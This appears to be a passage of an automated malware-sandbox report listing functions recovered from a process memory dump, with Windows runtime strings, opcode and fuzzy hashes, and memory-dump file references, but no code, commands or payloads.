                                                                • String ID: $29j$42:>$54?%$5>&"$==0~$q#'k$xq=8
                                                                • API String ID: 0-2804897488
                                                                • Opcode ID: ae24b7c912e6ff6871b7b6a8e4f2d56c647b38885a4ed322085bd82e7a71b637
                                                                • Instruction ID: 8c4b93ae8750f320f62641545189e0213bc46aa97121275cdac1cc460be187b4
                                                                • Opcode Fuzzy Hash: ae24b7c912e6ff6871b7b6a8e4f2d56c647b38885a4ed322085bd82e7a71b637
                                                                • Instruction Fuzzy Hash: A81125B081468D8ACF14CFC9D9856EEFFB1FB00700FA04288E415AE354DB795A468F99
                                                                Function 04BBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C002E7
                                                                • RTL: Re-Waiting, xrefs: 04C0031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C002BD
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                                • Instruction ID: d8d39e8031efdd2bb1c00b88a28773095198f527b495c84abafe1dac27357efb
                                                                • Opcode Fuzzy Hash: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                                • Instruction Fuzzy Hash: 05E1AE306047419FD725CF29C884B7AB7E1FB49314F144AADE8A5CB2E1E7B4E945CB82
                                                                Function 04BCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 04C07B8E
                                                                • RTL: Re-Waiting, xrefs: 04C07BAC
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C07B7F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                                • Instruction ID: 5d2287009b334b80f932f74c77fdb8f21e102a7f4a530278e0342ebf5bbe88da
                                                                • Opcode Fuzzy Hash: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                                • Instruction Fuzzy Hash: 294126317057029FDB24DE25D881B6AB7E6EF88714F000A5DF95ADB780DB30F5059B91
                                                                Function 04BCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C0728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 04C072A3
                                                                • RTL: Re-Waiting, xrefs: 04C072C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C07294
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                                • Instruction ID: 11c88b374c05c67a5079e53d5518056ed340b5bb87273e4fd187ea586cf269c0
                                                                • Opcode Fuzzy Hash: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                                • Instruction Fuzzy Hash: DB410F31709216ABDB24DE25CC82B6AB7A6FB84714F10465CF955EB280EB30F9529BD0
                                                                Function 04BD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction ID: 73c811ced668665b9063b238c16017b956f6b88c948527438643f63d9cef9580
                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction Fuzzy Hash: 59919270E002569BDF38DE69C881AFEB7A5EF44720F5449DAE865E72C0FF30A9418760
                                                                Function 04B99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                                • Instruction ID: b50b94d581e636404f4a98d3b0e3de3166a23488acedf31cc35f2237ee902338
                                                                • Opcode Fuzzy Hash: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                                • Instruction Fuzzy Hash: 17810DB5D00269ABDB35DF54CC44BEEB7B4AB48714F0041EAAA1DB7240E7716E94CFA0
                                                                Function 04A63AAE Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 48|}$j$}48z$~tyl
                                                                • API String ID: 0-2147111384
                                                                • Opcode ID: 750b35d6c06beb54168629759277d39f7315a8d4601974e0bfe16de925bfac15
                                                                • Instruction ID: 8c582f9e2ce96446f160f81c942e0ace061b46891e690b421164026a8585d500
                                                                • Opcode Fuzzy Hash: 750b35d6c06beb54168629759277d39f7315a8d4601974e0bfe16de925bfac15
                                                                • Instruction Fuzzy Hash: FFF024704187488FCB08AF08C405669BBE1FB99309F80072DE8C9CB321CF39D6018B46